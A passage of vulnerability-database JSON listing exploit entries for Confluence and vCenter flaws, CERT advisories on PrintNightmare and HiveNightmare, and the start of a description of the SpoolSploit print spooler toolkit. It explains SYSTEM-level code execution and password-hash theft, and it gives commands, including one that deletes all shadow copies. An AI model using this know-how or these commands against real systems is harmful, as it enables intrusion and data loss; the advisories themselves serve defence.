"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2023-11-24T20:19:46", "id": "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:55:53", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "CC614155-FD7D-599B-B89C-006B26D76F48", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:20:19", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "69FAE88E-7F22-5ACC-B555-3441BE00C566", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T17:42:26", "description": "# CVE-2021-22005 - VMWare vCenter Server File Upload to RCE\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T16:21:56", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-13T15:06:43", "id": "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T14:15:18", "description": "# CVE-2021-22005poc\nCVE-2021-22005 vcenter\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6279\u91cf\u9a8c\u8bc1poc\n\n\n\u4e00\u3001\u7528\u6cd5\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T13:11:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-03-15T03:51:38", "id": "9B660139-27C8-56B8-B9E2-8124D0E9F502", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cert": [{"lastseen": "2023-12-03T17:25:54", "description": "### Overview\n\nThe Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.\n\n### Description\n\nThe [RpcAddPrinterDriverEx()](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) function is used to install a printer driver on a system. One of the parameters to this function is the [DRIVER_CONTAINER](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/353ff796-6fb3-41cf-8b35-0022dd53d886>) object, which contains information about which driver is to be used by the added printer. The other argument, `dwFileCopyFlags`, specifies how replacement printer driver files are to be copied. An attacker can take advantage of the fact that any authenticated user can call `RpcAddPrinterDriverEx()` and specify a driver file that lives on a remote server. This results in the Print Spooler service `spoolsv.exe` executing code in an arbitrary DLL file with SYSTEM privileges.\n\nNote that while original exploit code relied on the `RpcAddPrinterDriverEx` to achieve code execution, [an updated version of the exploit](<https://github.com/cube0x0/CVE-2021-1675>) uses [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) to achieve the same goal. Both of these functions achieve their functionality using [AddPrinterDriverEx](<https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex>).\n\nWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does **NOT** protect against public exploits that may refer to `PrintNightmare` or CVE-2021-1675.\n\nOn July 1, Microsoft released [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). This bulletin states that CVE-2021-34527 is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(). The attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update. \n\n### Impact\n\nBy sending a request to add a printer, e.g. by using `RpcAddPrinterDriverEx()` over SMB or `RpcAsyncAddPrinterDriver()` over RPC, a remote, authenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable system. A local unprivileged user may be able to execute arbitrary code with SYSTEM privileges as well. We have created a flowchart to indicate exploitability of PrintNightmare across various platform configurations:\n\n![PrintNightmare exploitability flowchart](/static-bigvince-prod-kb-eb/383432_PrintNightmare%20Flowchart-v9.png)\n\n### Solution\n\n#### Apply an update\n\nMicrosoft has addressed this issue in the [updates for CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Note that the Microsoft update for CVE-2021-34527 does not effectively prevent exploitation of systems where the [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) `NoWarningNoElevationOnInstall` is set to a non-`0` value. Microsoft indicates that systems that have `NoWarningNoElevationOnInstall` is set to a non-`0` value are **vulnerable by design.** For systems that do not have the CVE-2021-34527 installed, or have Point and Print configured insecurely, please consider the following workarounds:\n\n#### Apply a workaround\n\nMicrosoft has listed several workarounds in their [advisory for CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Specifically:\n\n#### Microsoft Option 1 - Stop and disable the Print Spooler service\n\nThis vulnerability can be mitigated by stopping and disabling the Print Spooler service in Windows.\n\nIf disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands:\n\n`Stop-Service -Name Spooler -Force`\n\n`Set-Service -Name Spooler -StartupType Disabled`\n\n**Impact of workaround** Disabling the Print Spooler service disables the ability to print both locally and remotely.\n\n#### Microsoft Option 2 - Disable inbound remote printing through Group Policy\n\nDisable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\n**Note:** The Print Spooler service **must** be restarted for this workaround to be activated.\n\n#### Block RPC and SMB ports at the firewall\n\nLimited testing has shown that blocking both the RPC Endpoint Mapper (`135/tcp`) and SMB (`139/tcp` and `445/tcp`) incoming traffic at a host-based firewall level can prevent remote exploitation of this vulnerability. Note that blocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server.\n\n#### Enable security prompts for Point and Print\n\nEnsure that the Windows Point and Print Restrictions are set to `Show warning and elevation prompt` for both installing and updating drivers in the Windows Group Policy. Specifically the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\` key should have `NoWarningNoElevationOnInstall` and `UpdatePromptSettings` entries that are both set to `0`.\n\n#### Restrict printer driver installation ability to administrators\n\nAfter the Microsoft update for CVE-2021-34527 is installed, a registry value called `RestrictDriverInstallationToAdministrators` in the `HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\` key is checked, which is intended to restrict printer driver installation to only administrator users. Please see [KB5005010](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>) for more details.\n\n### Acknowledgements\n\nThis issue was publicly disclosed by Zhiniang Peng and Xuefeng Li.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n383432\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft __ Affected\n\nNotified: 2021-06-30 Updated: 2021-07-08 **CVE-2021-1675**| Affected \n---|--- \n**CVE-2021-34527**| Affected \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n \n\n\n### References\n\n * <https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/353ff796-6fb3-41cf-8b35-0022dd53d886>\n * <https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>\n * <https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex>\n * <https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>\n * <https://github.com/afwu/PrintNightmare>\n * <https://github.com/cube0x0/CVE-2021-1675>\n * <https://github.com/calebstewart/CVE-2021-1675>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-1675 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-1675>) [CVE-2021-34527 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-34527>) \n---|--- \n**Date Public:** | 2021-06-30 \n**Date First Published:** | 2021-06-30 \n**Date Last Updated: ** | 2021-08-03 15:36 UTC \n**Document Revision: ** | 32 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-30T00:00:00", "type": "cert", "title": "Microsoft Windows Print Spooler allows for RCE via AddPrinterDriverEx()", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-03T15:36:00", "id": "VU:383432", "href": "https://www.kb.cert.org/vuls/id/383432", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:25:56", "description": "### Overview\n\nMultiple versions of Windows 10 grant non-administrative users read access to files in the `%windir%\\system32\\config` directory. This can allow for local privilege escalation (LPE).\n\n### Description\n\nWith multiple versions of Windows 10, the `BUILTIN\\Users` group is given `RX` permissions to files in the `%windir%\\system32\\config` directory.\n\nIf a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to achieve a number of impacts, including but not limited to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\nNote that VSS shadow copies may not be available in some configurations, however simply having a system drive that is larger that 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be [automatically created](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/system-restore-points-disabled#more-information>). To check if a system has VSS shadow copies available, run the following command from a privileged command prompt:\n\n`vssadmin list shadows`\n\nA system with VSS shadow copies will report details of at least one shadow copy that specifies `Original Volume: (C:)`, such as the following:\n \n \n vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n (C) Copyright 2001-2013 Microsoft Corp.\n \n Contents of shadow copy set ID: {d9e0503a-bafa-4255-bfc5-b781cb27737e}\n Contained 1 shadow copies at creation time: 7/19/2021 10:29:49 PM\n Shadow Copy ID: {b7f4115b-4242-4e13-84c0-869524965718}\n Original Volume: (C:)\\\\?\\Volume{4c1bc45e-359f-4517-88e4-e985330f72e9}\\\n Shadow Copy Volume: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n Originating Machine: DESKTOP-PAPIHMA\n Service Machine: DESKTOP-PAPIHMA\n Provider: 'Microsoft Software Shadow Copy provider 1.0'\n Type: ClientAccessibleWriters\n Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered\n \n\nA system **without** VSS shadow copies will produce output like the following:\n \n \n vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n (C) Copyright 2001-2013 Microsoft Corp.\n \n No items found that satisfy the query.\n \n\nTo check if a system is vulnerable, the following command can be used from a non-privileged command prompt: `icacls %windir%\\system32\\config\\sam`\n\nA vulnerable system will report `BUILTIN\\Users:(I)(RX)` in the output like this:\n \n \n C:\\Windows\\system32\\config\\sam BUILTIN\\Administrators:(I)(F)\n NT AUTHORITY\\SYSTEM:(I)(F)\n BUILTIN\\Users:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n \n Successfully processed 1 files; Failed processing 0 files\n \n\nA system that is not vulnerable will report output like this:\n \n \n C:\\Windows\\system32\\config\\sam: Access is denied.\n Successfully processed 0 files; Failed processing 1 files\n \n\nThis vulnerability has been publicly referred to as both HiveNightmare and SeriousSAM, while Microsoft has assigned CVE-2021-36934 to the vulnerability.\n\n### Impact\n\nBy accessing files in the Windows `%windir%\\system32\\config` directory on a vulnerable system with at least one VSS shadow copy of the system drive, a local authenticated attacker may be able to achieve LPE, masquerade as other users, or achieve other security-related impacts.\n\n### Solution\n\nPlease see the [Microsoft bulletin for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>), which contains a workaround. Specifically:\n\n#### Restrict access to %windir%\\system32\\config and remove VSS shadow copies\n\nVulnerable systems can enable ACL inheritance for files in the `%windir%\\system32\\config` directory by running the following command from an elevated prompt:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\nOnce the ACLs have been corrected for these files, any VSS shadow copies of the system drive must be deleted to protect a system against exploitation. This can be accomplished with the following command:\n \n \n vssadmin delete shadows /for=%systemdrive% /Quiet\n \n\nConfirm that VSS shadow copies were deleted by running `vssadmin list shadows` again. Note that any capabilities relying on existing shadow copies, such as System Restore, will not function as expected. Newly-created shadow copies, which will contain the proper ACLs, will function as expected. Please see [KB5005357](<https://support.microsoft.com/en-us/topic/kb5005357-delete-volume-shadow-copies-1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>) for more details.\n\n### Acknowledgements\n\nThis vulnerability was publicly disclosed by Jonas Lyk, with additional details provided by Benjamin Delpy.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n506989\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft __ Affected\n\nNotified: 2021-07-20 Updated: 2021-07-20 **CVE-2021-36934**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>\n\n \n\n\n### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>\n * <https://support.microsoft.com/en-us/topic/kb5005357-delete-volume-shadow-copies-1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>\n * <https://twitter.com/jonasLyk/status/1417205166172950531>\n * <https://twitter.com/gentilkiwi/status/1417467063883476992>\n * <https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>\n * <https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/system-restore-points-disabled#more-information>\n * <https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-36934 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-36934>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-07-29 16:29 UTC \n**Document Revision: ** | 11 \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Microsoft Windows 10 gives unprivileged user access to system32\\config files", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T16:29:00", "id": "VU:506989", "href": "https://www.kb.cert.org/vuls/id/506989", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-12-03T16:47:46", "description": "[![](https://1.bp.blogspot.com/-RH9Wnu2YiuQ/YVi9OZW06YI/AAAAAAAAvWg/V0vRolVeGJAW1XjzaLGce7zf532DLrrQACNcBGAsYHQ/w640-h390/SpoolSploit_1_SpoolSploit-Usage.png)](<https://1.bp.blogspot.com/-RH9Wnu2YiuQ/YVi9OZW06YI/AAAAAAAAvWg/V0vRolVeGJAW1XjzaLGce7zf532DLrrQACNcBGAsYHQ/s1325/SpoolSploit_1_SpoolSploit-Usage.png>)\n\n \n\n\nA collection of Windows print spooler exploits containerized with other utilities for practical exploitation.\n\n \n\n\n**Summary** \n\n\nSpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account [credentials](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) to escalate privileges and execute malicious DLLs on [endpoints](<https://www.kitploit.com/search/label/Endpoints> \"endpoints\" ) with full system 